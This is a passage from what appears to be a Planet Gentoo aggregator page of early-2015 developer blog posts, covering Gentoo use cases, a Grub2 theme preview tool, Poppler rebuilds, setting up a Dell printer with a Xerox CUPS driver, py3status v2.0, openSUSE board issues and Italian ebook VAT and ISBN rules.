As Gentoo comes, by default, with a guaranteed-working toolchain, it’s a natural fit for software developers. A few years back, I tried to set up a development environment on Ubuntu. It was unbelievable painful. More recently, I attempted the same on a Mac. Same result — a total nightmare if you aren’t building for Mac or iOS.

Gentoo, on the other hand, provides a proven-working development environment because you build everything from scratch as you install the OS. If you need headers or some library, it’s already there. No problem. Whereas I’ve attempted to get all of the barebones dev packages installed on many other systems and it’s been hugely painful.

Frankly, I’ve never come across as easy of a dev environment as Gentoo, if you’ve managed to set it up as a user in the first place. And that’s the real problem.

People who need extreme flexibility (embedded, etc.)

Nearly 10 years ago, I founded the high-performance clustering project in Gentoo, because it was a fantastic fit for my needs as an end user in a higher-ed setting. As it turns out, it was also a good fit for a number of other folks, primarily in academia but also including the Adelie Linux team.

What we found was that you could get an extra 5% or so of performance out of building everything from scratch. At small scale that sounds absurd, but when that translates into 5-6 digits or more of infrastructure purchases, suddenly it makes a lot more sense.

In related environments, I worked on porting v5 of the Linux Terminal Server Project (LTSP) to Gentoo. This was the first version that was distro-native vs pretending to be a custom distro in its own right, and the lightweight footprint of a diskless terminal was a perfect fit for Gentoo.

In fact, around the same time I fit Gentoo onto a 1.8MB floppy-disk image, including either the dropbear SSH client or the kdrive X server for a graphical environment. This was only possible through the magic of the ROOT and PORTAGE_CONFIGROOT variables, which you couldn’t find in any other distro.

Other distros such as ChromeOS and CoreOS have taken similar advantage of Gentoo’s metadistribution nature to build heavily customized Linux distros.

People who want to learn how Linux works

Finally, another key use case for Gentoo is for people who really want to understand how Linux works. Because the installation handbook actually works you through the entire process of installing a Linux distro by hand, you acquire a unique viewpoint and skillset regarding what it takes to run Linux, well beyond what other distros require. In fact I’d argue that it’s a uniquely portable and low-level skillset that you can apply much more broadly than those you could acquire elsewhere.

In conclusion

I’ve suggested three core use cases that I think Gentoo should focus on. If it doesn’t fit those use cases, I would suggest that we allow but not specifically dedicate effort to enabling those particulars.

We’ve gotten overly deadened to how people want to use Linux, and this is my proposal as to how we could regain it.


Tagged: gentoo

January 12, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)
Tool to preview Grub2 themes easily (using KVM) (January 12, 2015, 21:04 UTC)

The short version: To preview a Grub2 theme live does not have to be hard.

Hi!

When I first wrote about a (potentially to lengthy) way to make a Grub2 theming playground in 2012, I was hoping that people would start throwing Gentoo Grub2 themes around so that it would become harder picking one rather than finding one. As you know, that didn’t happen.

Therefore, I am taken a few more steps now:

So this post is about that new tool: grub2-theme-preview. Basically, it does the steps I blogged about in 2012, automated:

  • Creates a sparse disk as a regular file
  • Adds a partition to it and formats using ext2
  • Installs Grub2, copies a theme of your choice and a config file to make it work
  • Starts KVM

That way, a theme creator can concentrate on the actual work on the theme.

To give an example, to preview theme “Archxion” off GitHub as of today you could run:

git clone https://github.com/hartwork/grub2-theme-preview.git
git clone https://github.com/Generator/Grub2-themes.git
cd grub2-theme-preview
./grub2-theme-preview ../Grub2-themes/Archxion/

Once grub2-theme-preview has distutils/setuputils packaging and a Gentoo ebuild, that gets a bite easier, still.

The current usage is:

# ./grub2-theme-preview --help
usage: grub2-theme-preview [-h] [--image] [--grub-cfg PATH] [--version] PATH

positional arguments:
  PATH             Path of theme directory (or image file) to preview

optional arguments:
  -h, --help       show this help message and exit
  --image          Preview a background image rather than a whole theme
  --grub-cfg PATH  Path grub.cfg file to apply
  --version        show program's version number and exit

Before using the tool, be warned that:

  • it is alpha/beta software that
  • needs root permissions in some part (calling sudo).
  • So I don’t take any warranty for anything right now!

Here is what to expect from running

# ./grub2-theme-preview /usr/share/grub/themes/gutsblack-archlinux/

assuming you have grub2-themes/gutsblack-archlinux off the grub2-themes overlay installed with this grub.cfg file:

Another example using the --image switch for background-image-only themes, using a 640×480 rendering of vector remake of gentoo-cow:


The latter is a good candidate for that Grub2 version of media-gfx/grub-splashes I mentioned earlier.

I’m looking forward to your patches and pull requests!

 

New Gentoo overlay: grub2-themes (January 12, 2015, 20:38 UTC)

Hi!

I’ve been looking around for Grub2 themes a bit and started a dedicated overlay to not litter the main repository. The overlay

Any Gentoo developer on GitHub probably has received a

[GitHub] Subscribed to gentoo/grub2-themes-overlay notifications

mail already. I did put it into Gentoo project account rather than my personal account because I do not want this to be a solo project: you are welcome to extend and improve. That includes pull requests from users.

The licensing situation (in the overlay, as well as with Grub2 themes in general) is not optimal. Right now, more or less all of the themes have all-rights-reserved for a license, since logos of various Linux distributions are included. So even if the theme itself is licensed under GPL v2 or later, the whole thing including icons is not. I am considering to add a use flag icons to control cutting the icons away. That way, people with ACCEPT_LICENSE="-* @FREE" could still use at least some of these themes. By the way, I welcome help identifying the licenses of each of the original distribution logos, if that sounds like an interesting challenge to you.

More to come on Grub2 themes. Stay tuned.

Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

Today's good news is that our manuscript "Thermally induced subgap features in the cotunneling spectroscopy of a carbon nanotube" has been accepted for publication by New Journal of Physics.
In a way, this work is directly building on our previous publication on thermally induced quasiparticles in niobium-carbon nanotube hybrid systes. As a contribution mainly from our theory colleagues, now the modelling of transport processes is enhanced and extended to cotunneling processes within Coulomb blockade. A generalized master equation based on the reduced density matrix approach in the charge conserved regime is derived, applicable to any strength of the intradot interaction and to finite values of the superconducting gap.
We show both theoretically and experimentally that also in cotunneling spectroscopy distinct thermal "replica lines" due to the finite quasiparticle occupation of the superconductor occur at higher temperature T~1K: the now possible transport processes lead to additional conductance both at zero bias and at finite voltage corresponding to an excitation energy; experiment and theoretical result match very well.

"Thermally induced subgap features in the cotunneling spectroscopy of a carbon nanotube"
S. Ratz, A. Donarini, D. Steininger, T. Geiger, A. Kumar, A. K. Hüttel, Ch. Strunk, and M. Grifoni
New J. Phys. 16, 123040 (2014), arXiv:1408.5000 (PDF)

http://www.akhuettel.de/publications/forschung.pdf
The 4/2014 edition of the "forschung" magazine of the DFG, published just a few days ago, includes an article about the work of our research group (in German)! Enjoy!

"Zugfest, leitend, defektfrei"
Kohlenstoff-Nanoröhren sind ein faszinierendes Material. In Experimenten bei ultratiefen Temperaturen versuchen Physiker, ihre verschiedenen Eigenschaften miteinander in Wechselwirkung zu bringen – und so Antworten auf grundlegende Fragen zu finden.
Andreas K. Hüttel
forschung 4/2014, 10-13 (2014) (PDF)

January 10, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
Poppler is contributing to global warming (January 10, 2015, 19:48 UTC)


As you may have noticed by now if you're running ~arch, the Poppler release policies have changed.

Previously Poppler (app-text/poppler) used to have stable branches with even middle version number, say e.g. 0.24, and bug fix releases 0.24.1, 0.24.2, 0.24.3, ... but a (most of the times) stable ABI. This meant that such upgrades could be installed without the need to rebuild any applications using Poppler. Development of new features took place in git master or in the development releases such as, say, 0.25.1, with odd middle number; these we never packaged in Gentoo anyway.

Now, the stable branches are gone, and Poppler has moved to a flat development model, with the 0.28.1 stable release (stable as intended by upstream, not "Gentoo stable") being followed by 0.29.0 and now 0.30.0 another month later. Unsurprisingly the ABI and the soversion of libpoppler.so has changed each time, triggering in Gentoo a rebuild of all applications linking to libpoppler.so. This includes among other things LuaTeX, Inkscape, and LibreOffice (wheee).

From a Gentoo maintainer point of view, the new schedule is not so bad; the API changes are minor (if any), and packages mostly "just compile". The only thing left to do is to check for soversion increases and bump the package subslot for the automated rebuild. We're much better off than all the binary distributions, since we can just keep tracking new Poppler releases and do not need to backport e.g. critical bug fixes ourselves just so the binary package fits to all the other binary packages of the distro.

From a Gentoo user point of view... well, I guess you can turn the heating down a bit. If you are running ~arch you will probably see some more LibreOffice rebuilds in the upcoming future. If things get too bad, you can always mask a new poppler version in /etc/portage/package.mask yourself (but better check for security bugs then, glsa-check from app-portage/gentoolkit is your friend); if the number of rebuilds gets completely out of hand, we may consider adding e.g. every second Poppler version only package-masked to the portage tree.

Aaron W. Swenson a.k.a. titanofold (homepage, bugs)
Dell 1350cnw on Gentoo Linux with CUPS (January 10, 2015, 13:00 UTC)

You’d think that a company that had produced and does produce some Linux based products would also provide CUPS drivers for their printers, like the Dell 1350cnw. Not so, it seems. Still, I was undeterred and found a way to make it happen.

First, download the driver for the Xerox Phaser 6000 in DEB format. Yeah, that’s right. We’re going to use a Xerox driver to print to our Dell printer.

Once you have it, do the following on the command line:

# unzip 6000_6010_deb_1.01_20110210.zip
# cd deb_1.01_20110210
# ar x xerox-phaser-6000-6010_1.0-1_i386.deb
# tar xf data.tar.gz
# gunzip usr/share/ppd/Xerox/Xerox_Phaser_6000B.ppd.gz
# mkdir -p /usr/lib/cups/filter/
# cp ~/deb_1.01_20110210/usr/lib/cups/filter/xrhkaz* /usr/lib/cups/filter/
# mkdir -p /usr/share/cups/Xerox/dlut/
# cp ~/deb_1.01_20110210/usr/share/cups/Xerox/dlut/Xerox_Phaser_6010.dlut /usr/share/cups/Xerox/dlut/

Or, because I’ve seen rumors that there are other flavors of Linux, if you’re on a distribution that supports DEB files, just initiate the install from the DEB file, however one does that.

Finally, add the Dell 1350cnw via the CUPS browser interface. (I used whichever one had “net” in the title as the printer is connected directly to the network.) Upload  ~/deb_1.01_20110210/usr/share/ppd/Xerox/Xerox_Phaser_6000B.ppd when prompted for a driver.

Everything works as expected for me, and in color!

January 09, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)

I finally took the time to watch The Perl Jam: Exploiting a 20 Year-old Vulnerability [31c3]. Oh, my, god.

January 07, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)
Slock 1.2 background colour (January 07, 2015, 02:41 UTC)

In a previous post, I discussed the method for changing the background colour for slock 1.1. Now that slock 1.2 is out, and is in the Portage tree in Gentoo, the ‘savedconfig’ USE flag is a little different than it used to be. In 1.1, the ‘savedconfig’ USE flag would essentially copy the config.mk file to /etc/portage/savedconfig/x11-misc/slock-$version. Now, in slock 1.2, there is still a config file in that location, but it is not just a copy of the config.mk file. Rather, one will see the following two-line file:

# cat /etc/portage/savedconfig/x11-misc/slock-1.2
#define COLOR1 "black"
#define COLOR2 "#005577"

As indicated in the file, you can use either a name for a generic colour (like “black”) or the hex representation for the colour of your choice (see The Color Picker for an easy way to find the hex code for your colours).

There are two things to keep in mind when editing this file:

  • The initial hash (#) is NOT indicating a comment, and MUST remain. If you remove it, slock 1.2 will fail to compile
  • The COLOR1 variable is for the default colour of the background, whilst the COLOR2 variable is for the background colour once one starts typing on a slocked screen

Hope that this information helps for those people using slock (especially within Gentoo Linux).

Cheers,
Zach

January 06, 2015
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
Finding a better blog workflow (January 06, 2015, 00:12 UTC)

I have been ranting about editors in the past few months, an year after considering shutting the blog down. After some more thinking out and fighting, I have now a better plan and the blog is not going away.

First of all, I decided to switch my editing to Draft and started paying for a subscription at $3.99/month. It's a simple-as-it-can-be editor, with no pretence. It provides the kind of "spaced out" editing that is so trendy nowadays and it provides a so-called "Hemingway" mode that does not allow you to delete. I don't really care for it, but it's not so bad.

More importantly it gets the saving right: if the same content is being edited in two different browsers, one gets locked (so I can't overwrite the content), and a big red message telling me that it can't save appears the moment I try to edit something and the Internet connection goes away or I get logged out. It has no fancy HTML editor, and instead is designed around Markdown, which is what I'm using nowadays to post on my blog as well. It supports C-i and C-b with it just fine.

As for the blog engine I decided not to change it. Yet. But I also decided that upgrading it to Publify is not an option. Among other things, as I went digging trying to fix a few of the problems I've been having I've discovered just how spaghetti-code it was to begin with, and I lost any trust in the developers. Continuing to build upon Typo without taking time to rewrite it from scratch is in my opinion time wasted. Upstream's direction has been building more and more features to support Heroku, CDNs, and so on so forth — my target is to make it slimmer so I started deleting good chunks of code.

The results have been positive, and after some database cleanup and removing support for structures that never were implemented to begin with (like primary and hierarchical categories), browsing the blog should be much faster and less of a pain. Among the features I dropped altogether is the theming, as the code is now very specific to my setup, and that allowed me to use the Rails asset pipeline to compile the stylesheets and javascripts; this should lead to faster load time for all (even though it also caused a global cache invalidation, sorry about that!)

My current plan is to not spend too much time on the blog engine in the next few weeks, as it reached a point where it's stable enough, but rather fix a few things in the UI itself, such as the Amazon ads loading that are currently causing some things to jump across the page a little too much. I also need to find a new, better way to deal with image lightboxes — I don't have many in use, but right now they are implemented with a mixture of Typo magic and JavaScript — ideally I'd like for the JavaScript to take care of everything, attaching itself to data-fullsize-url attributes or something like that. But I have not looked into replacements explicitly yet, suggestions welcome. Similarly, if anybody knows a good JavaScript syntax highligher to replace coderay, I'm all ears.

Ideally, I'll be able to move to Rails 4 (and thus Passenger 4) pretty soon. Although I'm not sure how well that works with PostgreSQL. Adding (manually) some indexes to the tables and especially making sure that the diamond-tables for tags and categories did not include NULL entries and had a proper primary key being the full row made quite the difference in the development environment (less so in production as more data is cached there, but it should still be good if you're jumping around my old blog posts!)

Coincidentally, among the features I dropped off the codebase I included the update checks and inbound links (that used the Google Blog Search service that does not exist any more), making the webapp network free — Akismet stopped working some time ago and that is one of the things I want to re-introduce actually, but then again I need to make sure that the connection can be filtered correctly.

By the way, for those who are curious why I spend so much time on this blog: I have been able to preserve all the content I could, from my first post on Planet Gentoo in April 2005, on b2evolution. Just a few months shorts of ten years now. I also was able to recover some posts from my previous KDEDevelopers blog from February that years and a few (older) posts in Italian that I originally sent to the Venice Free Software User Group in 2004. Which essentially means, for me, over ten years of memories and words. It is dear to me and most of you won't have any idea how much — it probably also says something about priorities in my life, but who cares.

I'm only bothered that I can't remember where I put the backup from blogspot I made of what I was writing when I was in high school. Sure it's not exactly the most pleasant writing (and it was all in Italian), but I really would like for it to be part of this single base. Oh and this is also the reason why you won't see me write more on G+ or Facebook — those two and Twitter are essentially just a rant platform to me, but this blog is part of my life.

January 05, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)
Gentoo Grub 2.x theme? (January 05, 2015, 22:11 UTC)

Hi!

It’s 2015 and I have not heard of any Gentoo GRUB 2.x themes, yet. Have you?

If you could imagine working on a theme based on the vector remake of gentoo-cow (with sound licensing), please get in touch!

CoreOS is based on… Gentoo! (January 05, 2015, 16:39 UTC)

I first heard about CoreOS from LWN.net in the news item on Rocket, CoreOS’s fork/re-write of Docker.

I ran into CoreOS again on 31c3 and learned it is based on… Gentoo! A few links for proof:

January 04, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

I'm posting this here because a new LibreOffice version was stabilized two days ago, and at the same time a hidden bug crept in...

Because of an unintended interaction between a python-related eclass and the app-office/libreoffice ebuilds (any version), merging recently self-generated (see below for exact timeframe) libreoffice binary packages can fail to install with the error

* ERROR: app-office/libreoffice-4.3.5.2::gentoo failed (setup phase):
* PYTHON_CFLAGS is invalid for python-r1 suite, please take a look @ https://wiki.gentoo.org/wiki/Project:Python/Python.eclass_conversion#PYTHON_CFLAGS 

The problem is fixed now, but any libreoffice binary packages generated with a portage tree from Fri Jan 2 00:15:15 2015 UTC to Sun Jan 4 22:18:12 2015 UTC will fail to reinstall. Current recommendation is to delete the self-generated binary package and re-install libreoffice from sources (or use libreoffice-bin).

This does NOT affect app-office/libreoffice-bin.

Updates may be posted here or on bug 534726. Happy heating. At least it's winter.

Alexys Jacob a.k.a. ultrabug (homepage, bugs)
py3status v2.0 (January 04, 2015, 19:16 UTC)

I’m very pleased to announce the release of py3status v2.0 which I’d like to dedicate to the person who’s behind all the nice improvements this release features : @tablet-mode !

His idea on issue #44 was to make py3status modules configurable. After some thoughts and merges of my own plans of development, we ended up with what I believe are the most ambitious features py3status provides so far.

Features

The logic behind this release is that py3status now wraps and extends your i3status.conf which allows all the following crazy features :

For all your i3bar modules i3status and py3status alike thanks to the new on_click parameter which you can use like any other i3status.conf parameter on all modules. It has never been so easy to handle click events !

This is a quick and small example of what it looks like :

# run thunar when I left click on the / disk info module
disk / {
    format = "/ %free"
    on_click 1 = "exec thunar /"
}
  • All py3status contributed modules are now shipped and usable directly without the need to copy them to your local folder. They also get to be configurable directly from your i3status config (see below)

No need to copy and edit the contributed py3status modules you like and wish to use, you can now load and configure them directly from your i3status.conf.

All py3status modules (contributed ones and user loaded ones) are now loaded and ordered using the usual syntax order += in your i3status.conf !

  • All modules have been improved, cleaned up and some of them got some love from contributors.
  • Every click event now triggers a refresh of the clicked module, even for i3status modules. This makes your i3bar more responsive than ever !

Contributors

  • @AdamBSteele
  • @obb
  • @scotte
  • @tablet-mode

Thank you

  • Jakub Jedelsky : py3status is now packaged on Fedora Linux.
  • All of you users : py3status has broken the 100 stars on github, I’m still amazed by this. @Lujeni’s prophecy has come true :)
  • I still have some nice ideas in stock for even more functionalities, stay tuned !

Michal Hrusecky a.k.a. miska (homepage, bugs)
Challenges in 2015 (January 04, 2015, 13:34 UTC)

Champagne Showers by Merlin2525You might have noticed that I decided to run for the openSUSE Board. And as we shortly have a new year and everybody is evaluating the past and the future, I will do the similar, mainly focusing on few of the challenges that I see laying in front of the openSUSE Board in 2015.

SUSE/openSUSE relation

I heard it being mentioned several times over and over. SUSE and openSUSE are two different things. But at the same time, they are pretty close. Close enough to be confusing. We have similar yet slightly distinct branding. Similar yet slightly distinct name and we have a clear overlap in terms of contributors. For people inside the project, it is easy to distinguish the entities. For people outside, not so much.

There was a nice talk by Zvezdana and Kent on openSUSE Conference about our branding. Part of the talk and one thing that people notice about openSUSE and SUSE is our logo. SUSE keeps updating it and it’s getting different over the time. On the other hand openSUSE logo stays the same. One open question from the talk was how to fix it. Either start diverging with our branding or get closer together. I know this is mainly question for the artwork team, but as will affect all of us, there should be broad discussion and as it involves logo and trademark, there need to be SUSE and board involved.

Apart from the logo/branding, there is also a technical aspect of the relation. We all say that openSUSE is the technical upstream of SLE. Things are being developed and tested in openSUSE and then adopted by SLE. But sometimes it is vice versa, as SUSE needs to develop some feature for SLE or one of it’s service packs and push it there. And as SLE and openSUSE schedules are unrelated, sometimes they can’t push it in openSUSE first. Even after the release openSUSE and SLE starts diverging and come together once in five years or so when it is a time to release a new SLE. It’s kinda shame, that we can’t help each other more often. It would be great to get SLE and openSUSE closer together in mutually beneficial way. But this is not going to be an easy nor fast discussion, again involving quite some teams/people. And I believe the Board should act as mediator/initiator in this discussion as well.

openSUSE Release

While talking about the release, we still have officially 8 months release cycle (or more precisely whenever coolo says so release cycle). It would be nice to have some decision that since we release two last releases after 12 months, maybe we are switching to one year release cycle. Or decide to stick with eight months. Or go for something completely different. But again, the point is, this is the hard discussion to have, but I beleive we have to start it and have a clear outcome of it, so people can kinda count on it. There is not much for board to do in this apart from calming heated discussion, but maybe it would make a sense to delay start of this discussion after the SLE openSUSE relation discussion (which probably needs to have board involved) and take the results of it into account. I personally think it definitely makes sense to at least align SLE and openSUSE schedules a little bit…

Conference

Last year we had a great conference in Dubrovnik. It was an awesome place, quite some interesting discussions as every year, but unfortunately not that many people. I liked it and hats off to the organizers, but we need to figure out what went wrong and why not so many people showed up in person. I hope for the best in Hague and that this years conference will see again plenty of people, but although the last conference was great, loosing people attending our most important event – openSUSE Conference – was also kinda disturbing… So we will see what happens in the Hague.

The rest

I’m sure there will be other challenges as well. In fact, even I would like more stuff to happen in the current year. But for those things, I don’t need a board, I can do or at least start them myself. Those few that I just mentioned are only those that I see as important, in need of some involvement from the board and being not yet entirely solved from the last year. Hopefully all of them will be solved in next year and we will have different problems, like how to find even the most subtle bugs as all other ones are solved and how to change the world for the better and whether is there still anything left to improve after everything we did in 2015 :-)

January 03, 2015
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
The Italian ISBN fraud (January 03, 2015, 17:12 UTC)

Books
Photo credit: Moyan Brenn

The title of the post is probably considered clickbait, but I think there is a fraud going on in Italy related to ISBN, and since I noted on my Facebook page that I have more information on this than the average person, even those who are usually quite well informed, I thought it's worth putting it down on paper.

It all started with an email I got from Amazon, in particular from the Kindle Direct Publishing service, which is how I publish Autotools Mythbuster as a Kindle book. At first I thought it was about the new VAT regulation for online services across Europe that are being announced by everybody and that will soon make most website give you ex-VAT prices and let you figure out how much you're actually paying. And indeed it was, until you get to this post-script:

Lastly, as of January 1, 2015, Italy has put in place a new law. Applicable VAT for eBooks sold in Italy will depend on whether the book has an ISBN. All eBooks with an ISBN will have a 4% VAT rate and eBooks without an ISBN will have a 22% VAT rate. This is the rate that is added to your price on January 1st and is the rate deducted when an Italian customer purchases your book. If you obtain an ISBN after January 1st, the 4% VAT rate will then apply for future sales but we will not adjust your list price automatically.

Since I've always felt strongly that discriminating books on whether they are paper or bits is a bad idea, the reduced VAT rate for books was actually good news, but tying it to the ISBN? Not so much. And here's why.

First of all, let's bust the myth of the ISBN being a requirement to publish a book. It's not, at least not universally. In particular, it's not a requirement in either Italy, Republic of Ireland or the United States of America. It is also not clear for many that in many countries, including at least Italy and Republic of Ireland, it's privately held companies that manage the ISBN distribution. In other countries there's a government agency to do that, and it may well be that it's more regulated there.

In the case of the UK agency (that also handles Republic of Ireland and is thus relevant to me), they make also explicit that there are plenty of situations in which you should not apply an ISBN, for instance for booklets that are not sold to the public (private events, museums, etc.). It might sound odd, but it makes perfect sense the moment when you realize what ISBN was designed to help with: distribution. The idea behind it is that any single edition of a book would have an unique code, so when your bookstore orders from the distributor, and the distributor from the publisher, you have the same ID over the place. A secondary benefit for citing references and bibliographies is often cited, but it is by far not the reason why ISBN was introduced.

So why would you tie the VAT rate on the presence of an ISBN? I can't think of any particular good reason off the top of my head. It makes things quite more complex for online ebook stores, especially those that have not been limited to stocking books with an ISBN to begin with (such as Amazon, Kobo, …). But even more so it makes it almost impossible for authors to figure out how to charge the buyers, if they are both in Europe. All is still easy of course if you're not trying to sell to Europe, or from Europe — wonder why we don't have more European startups, eh?

The bothersome part is that there is no such rule about VAT for physical books! Indeed many people in Italy are acquainted with schemes in which you join a "club" that would send you a book every month (unless you opt-out month by month, and if you don't you have to pay the price for it), and would sell books at a price much lower than the bookstore.

I'm sure they still exist although I'm not sure if Amazon makes them any interesting now, it was how I got into Lord of the Rings, as I ended up paying some €1.25 for it rather than the price of €30 for the same (hardcover) edition.

All those books were printed especially for the "club" and would thus not have an ISBN attached to them at all. One of the reason was probably to make it more difficult to sell them back second hand. But they have always been charged at 4% VAT anyway!

But the problems run further and that's hard to see for most consumers because they don't realize just how difficult the ISBN system is to navigate. Especially for "live" books like Autotools Mythbuster, every single revision needs its own unique ISBN — and since I usually do three to four updates to the book every year, that would be at least four different ISBNs per year. Add to that the fact that agencies decided that "ebook" is not a format, ePub, Mobi and PDF are, and you end up requiring multiple ISBNs per revision to cover for these formats.

Assume only two formats are needed for Autotools Mythbuster, which is only available om Amazon and Kobo. Assume three revisions an year (I would like to do more, I plan on spending more of 2015 writing documentation as I'm doing less hands-on work in Open Source lately). Now you need six ISBNs per year. If I was living in Canada, the problem is solved to begin with – ISBNs assignments in Canada are free – but I live in Ireland, and Nielsen is a for-profit company (I'll leave Italy aside for a moment, will go back to it later). If I were to buy a block of 10 codes (the minimum amount), I would have to pay £120 plus VAT and that would last me for almost two years — but that requires me making some €300-400 in royalties over those two years to break even on the up-front cost — there are taxes to be payed over the royalties, you know.

This means well over two hundreds copies of the book to be sold — I would love to, but I'm sure there aren't that many people interested in what I write. Not the two hundreds, but two hundreds every year — every update would have a hidden cost due to the ISBN needing to be updated, and if you provide the update for free (as I want to do), then you need to sell more copies incrementally.

Now I said above I'll leave Italy aside — here is why: up until now, the Italian agency for ISBN assignment only allowed publishers to buy blocks of ISBN codes — independent authors had no choice and could not get an ISBN at all. It probably had something to do with the fact that the agency is owned by the Italian publishers association (Associazione Italiana Editori). Admittedly the price is quite more affordable if you are a publisher as it is €30 to join and €50 every 10 codes.

But of course with the new law coming into effect it would have been too much of a discrimination against independent authors to not allow them to get ISBNs at all. So the agency decided that starting this January (or rather, starting from next week, as they are on vacation until the 7th) they will hand out individual ISBNs for "authorpublishing" — sic, in English, I wonder how drunk they were to come up with such a term, when the globally used term would be self-publishing. Of course the fee for those is €25 per code instead, five times as expensive as a publisher would pay for them.

And there is no documentation on how to apply for those yet, because of course they are on vacation still (January 6th is holiday in Italy, it's common for companies, schools, etc. to take the whole first week off.) and of course they only started providing the numbers when the law entered into effect, to avoid the discrimination. But of course it means that until the authors can find the time to look into the needed documentation, they will be discriminated. Again, only in Italy, as the rest of Europe does not have any such silly rule.

Now, at least a friend of mine was happy that at least for the majority of the ebooks we'll see a reduced VAT — but will we? I doubt so, as with any VAT change, prices will likely remain the same. When VAT increased from 20% to 21%, stores advertised the increased price for a week, then they came back to what they were before — because something priced at €3.99 wouldn't remain priced at €4.02 for long, it's even less convenient. In this case, I doubt that any publisher will change their MSRP for the ebooks to match the reduced VAT — I think the only place where this is going to make a difference is Amazon, as their KDP interface now matches the US price to the ex-VAT price of the books, so that the prices across Amazon websites no longer match across markets as they apply the local VAT, but I wouldn't be surprised that publishers would still set a MSRP to Amazon to match the same in-VAT price before and after the 22%→4% change, essentially increasing by over 10% their margin.

I'm definitely unconvinced of the new VAT regulations in Europe; they are essentially designed as a protectionistic measure for the various countries' companies for online services. But right now they are just making it more complex for all the final customers to figure out how much they are paying, and Italy in particular they seem to just be trying to ruin the newly-renewed independent authors' market which has been, to me, a nice gift of modern ebook distribution.